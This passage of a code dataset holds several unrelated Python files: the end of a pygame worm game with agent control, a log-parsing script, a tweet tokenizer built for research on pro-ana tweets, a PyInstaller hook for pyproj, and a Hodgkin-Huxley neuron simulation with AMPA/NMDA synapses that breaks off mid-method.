APPLES.append(apple)\n \n WORMS.append(Worm(random.randint(5, CELLWIDTH - 6), random.randint(5, CELLHEIGHT - 6), USEAGENTS))\n WORMS.append(Worm(random.randint(5, CELLWIDTH - 6), random.randint(5, CELLHEIGHT - 6), USEAGENTS))\n \n while True: # main game loop\n for event in pygame.event.get(): # event handling loop\n if event.type == QUIT:\n terminate()\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n terminate()\n\n if USEAGENTS == False:\n centralControl()\n \n for worm in WORMS:\n worm.tick()\n if len(APPLES) == 0:\n return\n \n for apple in APPLES:\n apple.tick()\n \n DISPLAYSURF.fill(BGCOLOR)\n drawGrid()\n for worm in WORMS:\n drawWorm(worm.wormCoords)\n \n for apple in APPLES: \n drawApple(apple)\n drawScore(SCORE, (50, 10))\n pygame.display.update()\n FPSCLOCK.tick(FPS)\n ticks += 1\n\ndef centralControl():\n #This method is the main central control logic.\n \n #Get a list of all known apples by all worms in the system.\n apples = set()\n for worm in WORMS:\n apples.update(worm.closeApples)\n\n #Assign a worm to go to each Apple\n for worm in WORMS:\n demApples = list(apples)\n if len(apples) > 0:\n assigned = False\n #Find the closest Apple and head there\n while assigned == False and len(demApples) > 0:\n assigned = True\n closestApple = reduce(lambda x,y: x if x.distance(worm.head) < y.distance(worm.head) else y, demApples)\n worm.moveTowardsPoint(closestApple)\n \n #If we aren't the closest worm to our closest Apple then find the next closest Apple\n closestWorm = reduce(lambda x,y: x if x.head.distance(closestApple) < 
y.head.distance(closestApple) else y, WORMS)\n if worm != closestWorm:\n worm.moveRandomDirection()\n demApples.remove(closestApple)\n assigned = False\n else:\n worm.moveRandomDirection()\n \n \n\ndef drawPressKeyMsg():\n pressKeySurf = BASICFONT.render('Press a key to play.', True, DARKGRAY)\n pressKeyRect = pressKeySurf.get_rect()\n pressKeyRect.topleft = (WINDOWWIDTH - 200, WINDOWHEIGHT - 30)\n DISPLAYSURF.blit(pressKeySurf, pressKeyRect)\n\n\ndef checkForKeyPress():\n if len(pygame.event.get(QUIT)) > 0:\n terminate()\n\n keyUpEvents = pygame.event.get(KEYUP)\n if len(keyUpEvents) == 0:\n return None\n if keyUpEvents[0].key == K_ESCAPE:\n terminate()\n return keyUpEvents[0].key\n\n\ndef showStartScreen():\n titleFont = pygame.font.Font('freesansbold.ttf', 100)\n titleSurf1 = titleFont.render('Wormy!', True, WHITE, DARKGREEN)\n titleSurf2 = titleFont.render('Wormy!', True, GREEN)\n\n degrees1 = 0\n degrees2 = 0\n while True:\n DISPLAYSURF.fill(BGCOLOR)\n rotatedSurf1 = pygame.transform.rotate(titleSurf1, degrees1)\n rotatedRect1 = rotatedSurf1.get_rect()\n rotatedRect1.center = (WINDOWWIDTH / 2, WINDOWHEIGHT / 2)\n DISPLAYSURF.blit(rotatedSurf1, rotatedRect1)\n\n rotatedSurf2 = pygame.transform.rotate(titleSurf2, degrees2)\n rotatedRect2 = rotatedSurf2.get_rect()\n rotatedRect2.center = (WINDOWWIDTH / 2, WINDOWHEIGHT / 2)\n DISPLAYSURF.blit(rotatedSurf2, rotatedRect2)\n\n drawPressKeyMsg()\n\n if checkForKeyPress():\n pygame.event.get() # clear event queue\n return\n pygame.display.update()\n FPSCLOCK.tick(FPS)\n degrees1 += 3 # rotate by 3 degrees each frame\n degrees2 += 7 # rotate by 7 degrees each frame\n\n\ndef terminate():\n pygame.quit()\n sys.exit()\n\n\ndef getRandomLocation():\n return Point(random.randint(0, CELLWIDTH - 1), random.randint(0, CELLHEIGHT - 1))\n\ndef getRandomLocationInQuadrant():\n return Point(random.randint(0, CELLWIDTH/2 - 1), random.randint(0, CELLHEIGHT/2 - 1))\n\n\ndef showGameOverScreen():\n gameOverFont = pygame.font.Font('freesansbold.ttf', 150)\n gameSurf = gameOverFont.render('Game', True, WHITE)\n overSurf = gameOverFont.render('Over', True, WHITE)\n gameRect = gameSurf.get_rect()\n overRect = overSurf.get_rect()\n gameRect.midtop = (WINDOWWIDTH / 2, 10)\n overRect.midtop = (WINDOWWIDTH / 2, gameRect.height + 10 + 25)\n\n DISPLAYSURF.blit(gameSurf, gameRect)\n DISPLAYSURF.blit(overSurf, overRect)\n drawPressKeyMsg()\n pygame.display.update()\n pygame.time.wait(500)\n checkForKeyPress() # clear out any key presses in the event queue\n\n while True:\n if checkForKeyPress():\n pygame.event.get() # clear event queue\n return\n\ndef drawScore(score, loc):\n scoreSurf = BASICFONT.render('Score: %s' % (score), True, WHITE)\n scoreRect = scoreSurf.get_rect()\n scoreRect.topleft = loc #(WINDOWWIDTH - 120, 10)\n DISPLAYSURF.blit(scoreSurf, scoreRect)\n\n\ndef drawWorm(wormCoords):\n for coord in wormCoords:\n x = coord.x * CELLSIZE\n y = coord.y * CELLSIZE\n wormSegmentRect = pygame.Rect(x, y, CELLSIZE, CELLSIZE)\n pygame.draw.rect(DISPLAYSURF, DARKGREEN, wormSegmentRect)\n wormInnerSegmentRect = pygame.Rect(x + 4, y + 4, CELLSIZE - 8, CELLSIZE - 8)\n pygame.draw.rect(DISPLAYSURF, GREEN, wormInnerSegmentRect)\n\n\ndef drawApple(apple):\n x = apple.x * CELLSIZE\n y = apple.y * CELLSIZE\n appleRect = pygame.Rect(x, y, CELLSIZE, CELLSIZE)\n pygame.draw.rect(DISPLAYSURF, RED, appleRect)\n\n\ndef drawGrid():\n for x in range(0, WINDOWWIDTH, CELLSIZE): # draw vertical lines\n pygame.draw.line(DISPLAYSURF, DARKGRAY, (x, 0), (x, WINDOWHEIGHT))\n for y in range(0, 
WINDOWHEIGHT, CELLSIZE): # draw horizontal lines\n pygame.draw.line(DISPLAYSURF, DARKGRAY, (0, y), (WINDOWWIDTH, y))\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"2015 Fall/CS6100 - Agents/Homework2/wormy.py","file_name":"wormy.py","file_ext":"py","file_size_in_byte":15587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"219291739","text":"import argparse\nfrom funcs import date_, read_line, open_files, close_files\n\ndef argments():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--year_start\", type=int, default=0)\n parser.add_argument(\"--year_end\", type=int, default=10000)\n parser.add_argument(\"--month_start\", type=int, default=1)\n parser.add_argument(\"--month_end\", type=int, default=12)\n parser.add_argument(\"--day_start\", type=int, default=1)\n parser.add_argument(\"--day_end\", type=int, default=31)\n parser.add_argument(\"--hour_start\", type=int, default=0)\n parser.add_argument(\"--hour_end\", type=int, default=24)\n args = parser.parse_args()\n kwargs = {\n \"year_start\": args.year_start,\n \"year_end\": args.year_end,\n \"month_start\": args.month_start,\n \"month_end\": args.month_end,\n \"day_start\": args.day_start,\n \"day_end\": args.day_end,\n \"hour_start\": args.hour_start,\n \"hour_end\": args.hour_end\n }\n return kwargs\nkwargs = argments()\n\ndef processing(files):\n file_log = {}\n date_log = {}\n date = ''\n for file in files:\n log = read_line(file, kwargs)\n if log is None:\n file.close()\n files.remove(file)\n continue\n file_log[file] = log\n while file_log:\n file, log = sorted(file_log.items(), key=lambda x:date_(x[1][3]))[0]\n if log[3] == date:\n if log[0] in date_log.keys():\n date_log[log[0]] += 1\n else:\n date_log[log[0]] = 1\n else:\n print_date_log(date_log)\n date = log[3]\n print(date)\n date_log = {log[0]: 1}\n log = read_line(file, kwargs)\n if log is None:\n file.close()\n files.remove(file)\n del file_log[file]\n else:\n file_log[file] = log\n print_date_log(date_log)\n\ndef print_date_log(date_log):\n for host, num in sorted(date_log.items(), key=lambda x:x[1], reverse=True):\n print(\"ip:\", host, \"\\t num:\", num)\n\n\nif __name__ == \"__main__\":\n with open(\"log_file_paths.txt\", 'r') as f:\n file_paths = f.read().splitlines()\n files = open_files(file_paths)\n processing(files)\n close_files(files)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"381770307","text":"\n# coding: utf-8\n\n# ## Twitter Regular Expressions\n# Regular expressions for pre-processing pro-ana tweets. Includes:\n# \n# - surrounding LIWC-aware punctuation with spaces\n# - (except for url's and twitter entities)\n# - regexes for assorted smileys into 4 tokens: ): (: (; :/\n# - case munging: lower case unless all caps\n# \n# The format is a list of `('search expression','replacement expression')` tuples.\n\n# In[2]:\n\nfrom __future__ import unicode_literals\n\ntry:\n re\nexcept NameError:\n import regex as re\n print (\"imported regex as re\")\n\ntry:\n from ttp import ttp\nexcept ImportError:\n ttp = None\n print(\"Couldn't load twitter-text! Tweet entities may not be recognised! 
Try `pip install twitter-text-python`\")\n\ntry:\n # Python 2.6-2.7 \n from HTMLParser import HTMLParser\n unescape = HTMLParser().unescape\nexcept ImportError:\n # Python 3.5\n from html import unescape\n\nfrom itertools import chain # is this the same in python 2?\nfrom operator import itemgetter\n\n\n# In[2]:\n\npunctuationRe = r\"\"\" (['`\\[\\](){}⟨⟩:,\\-‒–—―!.?‘’“”\"•;…/\\|=+_~@#^&*<>]) \"\"\"\n\nregexStyles = [\"twitterProAna\",\"wordsAndPunct\",\"walworth\"]\ndef setupRegexes(style=\"twitterProAna\"):\n if style == regexStyles[0]: # twitterProAna or twitterEmoji\n def separateNumbers(m):\n if separateNumbers.string != m.string:\n separateNumbers.string = m.string\n separateNumbers.notParsing = False\n s=m.group()\n if s in set(('http','@','#')):\n separateNumbers.notParsing = True\n return s\n if s == ' ':\n separateNumbers.notParsing = False\n return s\n if separateNumbers.notParsing:\n return s\n return ' '+s+' '\n separateNumbers.string = None\n separateNumbers.searchString = r\"http|@|#|\\d+|\\s\"\n \n def skipEntities(m):\n \n return ' '+s+' '\n LIWC_punct = r\"\"\"'`\\[\\](){}⟨⟩:,\\-‒–—―!.?‘’“”\"•;…/\\|=+_~@#^&*<>\"\"\"\n cleaningReList = [ # surround punctuation with spaces (needs regex module, re module doesn't work!)\n (r\"(?V1)([\"+LIWC_punct+\"||[^\\p{Letter}\\p{Separator}\\p{Number}]])\",r\" \\1 \"),\n # standardise quote characters\n (u\"['`‘’“”\\\"]\",\"'\"),\n # standardise smileys\n (r\" [:=;] ( [\\-Do'`‘’xPpLCc\"'\"'r\"/,~] )?( [(\\[{] )+\",\" ): \"),\n (r\" [:=] ( [\\-Do'`‘’xPpLCc\"'\"'r\"/,~] )?( [)\\]}] )+\",\" (: \"),\n (r\" ; ( [\\-Do'`‘’xPpLCc\"'\"'r\"/~] )?( [)\\]}] )+|( [(\\[{] )+( [\\-Do'`‘’xPpLCc\"'\"'r\"/~] )? ; \",\" (; \"),\n (r\"(?])\"\"\",r\" \\1 \"),\n (u\"['`‘’’“”\\\"]\",\"'\"),\n (u\"[\\-‒–—―]\",\"-\"),\n (r\"(?<=[a-zA-Z])(?=\\d)|(?<=\\d)(?=[a-zA-Z])\",\" \"),\n (r\"(\\w) ' (\\w)\",r\"\\1'\\2\")\\\n ]\n if style == regexStyles[2]: # \"walworth\"\n cleaningReList.append((r\"(-\\s+)+\",r\"- \"))\n cleaningReList.append((r\".\\s*$\",r\"\"))\n else:\n raise ValueError(\"Possible regexStyles: %s\"%regexStyles) \n return cleaningReList\n\nregexList = setupRegexes()\n\ndef cleanString(regexList, text):\n '''Old cleanString function to support legacy code.'''\n text = unescape(text)\n if type(text) is str:\n try:\n text = text.decode('utf-8')\n except AttributeError:\n pass # python 3 strings don't do 'decode', but should be ok, so no need to do it anyway\n for regex in regexList:\n text = re.sub(regex[0],regex[1],text)\n return text\n\n\n# In[ ]:\n\ntry:\n tweetParser = ttp.Parser(include_spans=True)\nexcept AttributeError:\n tweetParser = None\n\n# ttpParserLookup\n \ndef tweetPreprocessor(text, entitiesToDetect=(\"urls\", \"users\", \"lists\", \"tags\")):\n \"\"\"Takes a string, returns tuples containing either \n (True, text_needing_parsing) or (False, entity_text_dont_parse)\n This relies on the ttp module for parsing tweets. 
If that module not present, it will silently pass the \n whole text with \"True\".\n \"\"\"\n try:\n entities = tweetParser.parse(text)\n except AttributeError:\n yield (True, text)\n return\n \n spans = []\n for label in entitiesToDetect:\n spanList = getattr(entities, label)\n if spanList:\n if label == 'lists':\n # lists are returned as a 3-tuple (name, user, (span)), we discard the user\n spanList = [(span[0], span[2]) for span in spanList] \n spans.extend(spanList)\n idx = 0\n for span in sorted(spans, key=itemgetter(1)):\n entityStart, entityEnd = span[1]\n startString = text[idx:entityStart]\n if startString:\n yield (True, startString)\n ent = text[entityStart:entityEnd]\n if ent:\n yield (False, ent)\n idx = entityEnd\n endString = text[idx:]\n if endString:\n yield (True, endString)\n\ndef tokenize(text, regexList=regexList, preprocessor=tweetPreprocessor):\n \"\"\"Tokenize a string, returning an iterator over tokens as strings.\n text : the string to be tokenized\n regexList : a list of (regex,replaceString) tuples, defaults to tweet specific processing\n preprocessor : a generator function preprocessor(text) which returns (boolean,substring) tuples, \n the boolean indicating if regexes should be applied. If None, apply regexes to original string.\n \n After applying regexes, the resulting string(s) are split on whitespace and yielded. Substrings returned by \n the preprocessor with False are yielded as is (no regexes, no split)\n \"\"\"\n subStringIter = preprocessor(text) if preprocessor else (True, text)\n for cleanIt, subString in subStringIter:\n if cleanIt:\n for word in cleanString(regexList, subString).split():\n yield word\n else:\n yield subString\n\n\n# In[6]:\n\n__doc__ = \"\"\"\nDefined functions setupRegexes(style=\\\"twitterProAna\\\"), cleanString(regexList, text) and tokenize(text).\nAvailable regexStyles are:\n\"\"\"\nfor s in regexStyles:\n __doc__ += \" %s\\n\"%s\n\n","sub_path":"fivePointRegression/drevicko/twitter_regexes.py","file_name":"twitter_regexes.py","file_ext":"py","file_size_in_byte":8086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"394549765","text":"# ------------------------------------------------------------------\n# Copyright (c) 2020 PyInstaller Development Team.\n#\n# This file is distributed under the terms of the GNU General Public\n# License (version 2.0 or later).\n#\n# The full license is available in LICENSE.GPL.txt, distributed with\n# this software.\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n# ------------------------------------------------------------------\n\nimport os\nimport sys\nfrom PyInstaller.utils.hooks import collect_data_files\nfrom PyInstaller.compat import is_win\n\n\nhiddenimports = [\n \"pyproj.datadir\"\n]\n\ndatas = collect_data_files('pyproj')\n\nif hasattr(sys, 'real_prefix'): # check if in a virtual environment\n root_path = sys.real_prefix\nelse:\n root_path = sys.prefix\n\n# - conda-specific\nif is_win:\n tgt_proj_data = os.path.join('Library', 'share', 'proj')\n src_proj_data = os.path.join(root_path, 'Library', 'share', 'proj')\n\nelse: # both linux and darwin\n tgt_proj_data = os.path.join('share', 'proj')\n src_proj_data = os.path.join(root_path, 'share', 'proj')\n\nfrom PyInstaller.compat import is_conda\nif is_conda:\n if os.path.exists(src_proj_data):\n datas.append((src_proj_data, tgt_proj_data))\n else:\n from PyInstaller.utils.hooks import logger\n logger.warning(\"Datas for pyproj not found at:\\n{}\".format(src_proj_data))\n # A 
runtime hook defines the path for `PROJ_LIB`\n","sub_path":"env/lib/python3.8/site-packages/_pyinstaller_hooks_contrib/hooks/stdhooks/hook-pyproj.py","file_name":"hook-pyproj.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"570599238","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 15 18:53:50 2018\n\n@author: ishida\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass Neuron_HH:\n    def __init__(self, N=1, dt=0.04, T=100000, Cm=1, Vth=-56.2,\n                 gleak=0.0205, eleak=-70.3, gNa=56, eNa=50,\n                 gK=6, eK=-90, gm=0.075, tau_max=608,\n                 gtCa=0.4, eCa=120,\n                 syncp=1, Pmax_AMPA=1, Pmax_NMDA=1, tau_syn=5.26, esyn=0,\n                 Iext_amp=1, noise=2, D=0.5, alpha=0.5, beta=0.1, ramda=-10,\n                 Mg=1, delay=10, tau_rise_AMPA=1.1, tau_rise_NMDA=145, tau_inact_AMPA=5, tau_inact_NMDA=55,\n                 tau_rec_AMPA=200, tau_rec_NMDA=200, U_SE_AMPA=0.7, U_SE_NMDA=0.03, A_SE_AMPA=0.3, A_SE_NMDA=0.4,\n                 gaussian_scale=0.5, poisson_lam=0.5):\n        # number of neurons\n        self.N = N\n        # time step\n        self.dt = dt\n        # simulation time\n        self.T = T\n        # all time\n        self.Tsteps = np.arange(0, self.T, self.dt)\n        # number of time steps\n        self.allsteps = len(self.Tsteps)\n\n        # membrane capacitance\n        self.Cm = Cm\n        # threshold voltage\n        self.Vth = Vth\n\n        # Refractory Period\n        self.delay = delay\n\n        # for dynamic synapse\n        # time constant of synapse current\n        self.tau_rise_AMPA = tau_rise_AMPA\n        self.tau_rise_NMDA = tau_rise_NMDA\n        self.tau_inact_AMPA = tau_inact_AMPA\n        self.tau_inact_NMDA = tau_inact_NMDA\n        self.tau_rec_AMPA = tau_rec_AMPA\n        self.tau_rec_NMDA = tau_rec_NMDA\n\n        self.U_SE_AMPA = U_SE_AMPA\n        self.U_SE_NMDA = U_SE_NMDA\n\n        self.A_SE_AMPA = A_SE_AMPA\n        self.A_SE_NMDA = A_SE_NMDA\n\n        # Recovered\n        self.R_AMPA = 1 * np.ones((self.N, self.N, self.allsteps))  # need 3 dimension when making neuronal network\n        self.dR_AMPA = 0\n        self.R_NMDA = 1 * np.ones((self.N, self.N, self.allsteps))\n        self.dR_NMDA = 0\n        # Effective\n        # self.E = 0 * np.ones((self.N, self.N, self.allsteps))\n        # self.dE = 0\n        self.E_AMPA = 0 * np.ones((self.N, self.N, self.allsteps))\n        self.dE_AMPA = 0\n        self.E_NMDA = 0 * np.ones((self.N, self.N, self.allsteps))\n        self.dE_NMDA = 0\n        # Inactive\n        self.I_AMPA = 0 * np.ones((self.N, self.N, self.allsteps))  # I = 1 - R - E\n        self.I_NMDA = 0 * np.ones((self.N, self.N, self.allsteps))\n\n        # leak\n        self.gleak = gleak * np.ones(self.N)\n        self.eleak = eleak * np.ones(self.N)\n\n        # Na\n        self.gNa = gNa * np.ones(self.N)\n        self.eNa = eNa * np.ones(self.N)\n\n        # K\n        self.gK = gK * np.ones(self.N)\n        self.eK = eK * np.ones(self.N)\n        self.tau_max = tau_max\n        self.gm = gm * np.ones(self.N)\n\n        # T type Ca\n        self.gtCa = gtCa * np.ones(self.N)\n        self.eCa = eCa * np.ones(self.N)\n\n        # synapse\n        self.tau_syn = tau_syn\n        self.esyn = esyn * np.ones((self.N, self.N))\n        self.gsyn = 0 * np.ones((self.N, self.N))  # gsyn was defined as 0.025, but it is set to 0 here\n        self.gAMPA = 0 * np.ones((self.N, self.N))\n        self.gNMDA = 0 * np.ones((self.N, self.N))\n\n        # voltage dependence of NMDA receptor\n        self.Mg = Mg\n\n        # type of synaptic coupling\n        self.syncp = syncp\n\n        self.Pmax_AMPA = Pmax_AMPA\n        self.Pmax_NMDA = Pmax_NMDA\n        self.fire_tmp = np.zeros(self.N)\n\n        # noise\n        self.noise = noise\n        self.Inoise = np.zeros((self.N, self.allsteps))\n        self.D = D  # noise intensity\n        self.gaussian_scale = gaussian_scale\n        self.poisson_lam = poisson_lam\n\n        # self.g = np.random.randn(self.N, self.allsteps)\n        self.g = np.random.normal(0, self.dt**(1/2), (self.N, 
self.allsteps))\n        # for Ornstein-Uhlenbeck process\n\n        self.alpha = alpha\n        self.beta = beta\n        self.ramda = ramda\n\n        # firing time\n        self.t_ap = -100000 * np.ones((self.N, self.N, 2))\n\n        # voltage\n        self.V = -65 * np.ones((self.N, self.allsteps))\n        self.dV = 0 * np.ones(self.N)\n\n        # current\n        self.Ileak = 0 * np.ones((self.N, self.allsteps))\n        self.INa = 0 * np.ones((self.N, self.allsteps))\n        self.IK = 0 * np.ones((self.N, self.allsteps))\n        self.Im = 0 * np.ones((self.N, self.allsteps))\n        self.ItCa = 0 * np.ones((self.N, self.allsteps))\n\n        # synapse current\n        self.Isyn = np.zeros((self.N, self.allsteps))\n        self.INMDA = np.zeros((self.N, self.allsteps))\n        self.IAMPA = np.zeros((self.N, self.allsteps))\n\n        self.m = 0.5 * np.ones((self.N, self.allsteps))\n        self.h = 0.06 * np.ones((self.N, self.allsteps))\n        self.n = 0.5 * np.ones((self.N, self.allsteps))\n        self.p = 0.5 * np.ones((self.N, self.allsteps))\n        self.u = 0.5 * np.ones((self.N, self.allsteps))\n\n        self.alpha_m = 0 * np.ones((self.N, self.allsteps))\n        self.beta_m = 0 * np.ones((self.N, self.allsteps))\n        self.alpha_h = 0 * np.ones((self.N, self.allsteps))\n        self.beta_h = 0 * np.ones((self.N, self.allsteps))\n        self.alpha_n = 0 * np.ones((self.N, self.allsteps))\n        self.beta_n = 0 * np.ones((self.N, self.allsteps))\n        self.p_inf = 0 * np.ones((self.N, self.allsteps))\n        self.tau_p = 0 * np.ones((self.N, self.allsteps))\n        self.s_inf = 0 * np.ones((self.N, self.allsteps))\n        self.u_inf = 0 * np.ones((self.N, self.allsteps))\n        self.tau_u = 0 * np.ones((self.N, self.allsteps))\n\n        self.dm = 0 * np.ones(self.N)\n        self.dh = 0 * np.ones(self.N)\n        self.dn = 0 * np.ones(self.N)\n        self.dp = 0 * np.ones(self.N)\n        self.du = 0 * np.ones(self.N)\n\n        # external input current\n        self.Iext_amp = Iext_amp\n\n        self.Iext = np.zeros((self.N, self.allsteps))\n\n        \"\"\"\n        self.Iext[0, 10000:20000] = -self.Iext_amp\n        self.Iext[0, 25000:35000] = self.Iext_amp\n        self.Iext[0, 40000:50000] = 2 * self.Iext_amp\n        \"\"\"\n        \"\"\"\n        # input current as delta function\n        self.Iext[0, int(60000/self.dt):int(60005/self.dt)] = self.Iext_amp\n        \"\"\"\n        self.Iext[0, int(2000/self.dt):int(8000/self.dt)] = self.Iext_amp\n\n        # current step\n        self.curstep = 0\n\n    def biexp_func(self, t, Pmax, t_rise, t_fall):\n        if t < 0:\n            return 0\n        elif Pmax * (np.exp(- t / t_fall) - np.exp(- t / t_rise)) < 0.00001:\n            return 0\n        else:\n            return Pmax * (np.exp(- t / t_fall) - np.exp(- t / t_rise))\n\n    def exp_decay(self, x, tau_rise):\n        if (x / tau_rise) > 100:\n            return 0\n        else:\n            return np.exp(- x / tau_rise)\n\n    def normalize_AMPA(self, U_SE_AMPA):\n        if U_SE_AMPA == 0.1:\n            return 1 / 0.0559324\n        elif U_SE_AMPA == 0.2:\n            return 1 / 0.1167792\n        elif U_SE_AMPA == 0.3:\n            return 1 / 0.1683591\n        elif U_SE_AMPA == 0.4:\n            return 1 / 0.2159080\n        elif U_SE_AMPA == 0.5:\n            return 1 / 0.2753359\n        elif U_SE_AMPA == 0.6:\n            return 1 / 0.3172174\n        elif U_SE_AMPA == 0.7:\n            return 1 / 0.37\n        elif U_SE_AMPA == 0.8:\n            return 1 / 0.4222531\n        elif U_SE_AMPA == 0.9:\n            return 1 / 0.468\n        elif U_SE_AMPA == 0.03:\n            return 1 / 0.0172168\n\n    def normalize_NMDA(self):\n        return 1 / 0.43\n\n    def calc_synaptic_input(self, i):\n        # recording present fire time as previous fire time\n        # if self.Vi[i] > -20 and (self.curstep * self.dt - self.fire_tmp[i]) > self.delay and self.curstep * self.dt > 200:\n        if self.Vi[i] > -20 and self.curstep * self.dt > 200:\n            self.t_ap[i, :, 1] = self.t_ap[i, :, 0]\n            self.t_ap[i, :, 0] = self.curstep * self.dt\n            self.fire_tmp[i] = self.curstep * self.dt\n\n        # sum of the synaptic current for each 
neuron\n # syncp\n # 1 : biexp_func()\n # 2 : dynamic_synapse\n # 3 : no synapse current\n\n if self.syncp == 1:\n for j in range(0, self.N):\n\n if self.curstep * self.dt > 200:\n \"\"\"\n self.gAMPA[i, j] = self.biexp_func(self.curstep * self.dt - self.t_ap[j, i, 0], self.Pmax_AMPA, 1, 2)\n self.gNMDA[i, j] = (self.biexp_func(self.curstep * self.dt - self.t_ap[j, i, 0],\n self.Pmax_NMDA, 10, 150) / (\n 1 + (4.5 / 3.57) * np.exp(- 0.062 * self.Vi))) / (\n 1 + (self.Mg / 3.57) * np.exp(self.Vi / 16.13))\n \"\"\"\n self.gNMDA[i, j] = self.biexp_func(self.curstep * self.dt - self.t_ap[j, i, 0], self.Pmax_NMDA, 20, 125) / (1 + (self.Mg / 3.57) * np.exp(-0.062 * self.Vi))\n self.gAMPA[i, j] = self.biexp_func(self.curstep * self.dt - self.t_ap[j, i, 0], self.Pmax_AMPA, 0.8, 5)\n\n self.gsyn[i, j] = self.gAMPA[i, j] + self.gNMDA[i, j]\n\n else:\n self.gsyn[i, j] = 0\n\n if self.syncp == 2:\n for j in range(0, self.N):\n \"\"\"\n self.dR_AMPA = (self.dt * ((self.I_AMPA[i, j, self.curstep] / self.tau_rec_AMPA)\n - self.R_AMPA[i, j, self.curstep] * self.U_SE_AMPA * self.exp_decay(self.curstep * self.dt - (self.t_ap[j, i, 0] + self.delay), self.tau_rise_AMPA)))\n self.dR_NMDA = (self.dt * ((self.I_AMPA[i, j, self.curstep] / self.tau_rec_NMDA)\n - self.R_NMDA[i, j, self.curstep] * self.U_SE_NMDA * self.exp_decay(self.curstep * self.dt - (self.t_ap[j, i, 0] + self.delay), self.tau_rise_NMDA)))\n self.dE_AMPA = (self.dt * ((- self.E_AMPA[i, j, self.curstep] / self.tau_inact_AMPA)\n + self.U_SE_AMPA * self.R_AMPA[i, j, self.curstep] * self.exp_decay(self.curstep * self.dt - (self.t_ap[j, i, 0] + self.delay), self.tau_rise_AMPA)))\n self.dE_NMDA = (self.dt * ((- self.E_NMDA[i, j, self.curstep] / self.tau_inact_NMDA)\n + self.U_SE_NMDA * self.R_NMDA[i, j, self.curstep] * self.exp_decay(self.curstep * self.dt - (self.t_ap[j, i, 0] + self.delay), self.tau_rise_NMDA)))\n \"\"\"\n self.dR_AMPA = (self.dt * ((self.I_AMPA[i, j, self.curstep] / self.tau_rec_AMPA)\n - self.R_AMPA[i, j, self.curstep] * self.U_SE_AMPA * self.exp_decay(\n self.curstep * self.dt - self.t_ap[j, i, 0], self.tau_rise_AMPA)))\n self.dR_NMDA = (self.dt * ((self.I_AMPA[i, j, self.curstep] / self.tau_rec_NMDA)\n - self.R_NMDA[i, j, self.curstep] * self.U_SE_NMDA * self.exp_decay(\n self.curstep * self.dt - self.t_ap[j, i, 0], self.tau_rise_NMDA)))\n self.dE_AMPA = (self.dt * ((- self.E_AMPA[i, j, self.curstep] / self.tau_inact_AMPA)\n + self.U_SE_AMPA * self.R_AMPA[i, j, self.curstep] * self.exp_decay(\n self.curstep * self.dt - self.t_ap[j, i, 0], self.tau_rise_AMPA)))\n self.dE_NMDA = (self.dt * ((- self.E_NMDA[i, j, self.curstep] / self.tau_inact_NMDA)\n + self.U_SE_NMDA * self.R_NMDA[i, j, self.curstep] * self.exp_decay(\n self.curstep * self.dt - self.t_ap[j, i, 0], self.tau_rise_NMDA)))\n\n self.R_AMPA[i, j, self.curstep + 1] = self.R_AMPA[i, j, self.curstep] + self.dR_AMPA\n self.R_NMDA[i, j, self.curstep + 1] = self.R_NMDA[i, j, self.curstep] + self.dR_NMDA\n self.E_AMPA[i, j, self.curstep + 1] = self.E_AMPA[i, j, self.curstep] + self.dE_AMPA\n self.E_NMDA[i, j, self.curstep + 1] = self.E_NMDA[i, j, self.curstep] + self.dE_NMDA\n self.I_AMPA[i, j, self.curstep + 1] = 1 - self.R_AMPA[i, j, self.curstep + 1] - self.E_AMPA[i, j, self.curstep + 1]\n self.I_NMDA[i, j, self.curstep + 1] = 1 - self.R_NMDA[i, j, self.curstep + 1] - self.E_NMDA[i, j, self.curstep + 1]\n \"\"\"\n self.gNMDA[i, j] = self.A_SE_NMDA * self.E_NMDA[i, j, self.curstep] / (1 + (self.Mg / 3.57) * np.exp(-0.062 * self.Vi))\n self.gAMPA[i, j] = self.A_SE_AMPA * 
self.E_AMPA[i, j, self.curstep]\n \"\"\"\n\n # normalize E_NMDA & E_AMPA\n self.gNMDA[i, j] = self.normalize_NMDA() * self.A_SE_NMDA * self.E_NMDA[i, j, self.curstep] / (\n 1 + (self.Mg / 3.57) * np.exp(-0.062 * self.Vi))\n self.gAMPA[i, j] = self.normalize_AMPA(self.U_SE_AMPA) * self.A_SE_AMPA * self.E_AMPA[i, j, self.curstep]\n\n if self.syncp == 3:\n pass\n\n # sum\n for j in range(0, self.N):\n self.IAMPAi[j] += self.gAMPA[i, j] * (self.esyn[i, j] - self.Vi[j])\n self.INMDAi[j] += self.gNMDA[i, j] * (self.esyn[i, j] - self.Vi[j])\n self.Isyni[j] = self.IAMPAi[j] + self.INMDAi[j]\n \"\"\"\n for j in range(0, self.N):\n self.IAMPAi[i] += self.gAMPA[i, j] * (self.esyn[i, j] - self.Vi[i])\n self.INMDAi[i] += self.gNMDA[i, j] * (self.esyn[i, j] - self.Vi[i])\n self.Isyni[i] = self.IAMPAi[i] + self.INMDAi[i]\n \"\"\"\n\n self.IAMPA[i, self.curstep] = self.IAMPAi[i]\n self.INMDA[i, self.curstep] = self.INMDAi[i]\n self.Isyn[i, self.curstep] = self.Isyni[i]\n\n # activation function\n # a / (1 + exp(b * (x - c))\n def activation_func_sigmoid(self, a, b, c, v):\n return a / (1.0 + np.exp(np.clip(b * (v - c), -500, 500)))\n\n # a * exp(b * (v - c))\n def activation_func_exp(self, a, b, c, v):\n return a * np.exp(np.clip(b * (v - c), -500, 500))\n\n # a * (v - b) / (exp(c * (v - d)) - 1)\n def activation_func_ReLUlike(self, a, b, c, d, v):\n return a * (v - b) / (np.exp(np.clip(c * (v - d), -500, 500)) - 1)\n\n def propagation(self):\n\n self.Vi = self.V[:, self.curstep]\n\n self.Ileaki = self.Ileak[:, self.curstep]\n self.INai = self.INa[:, 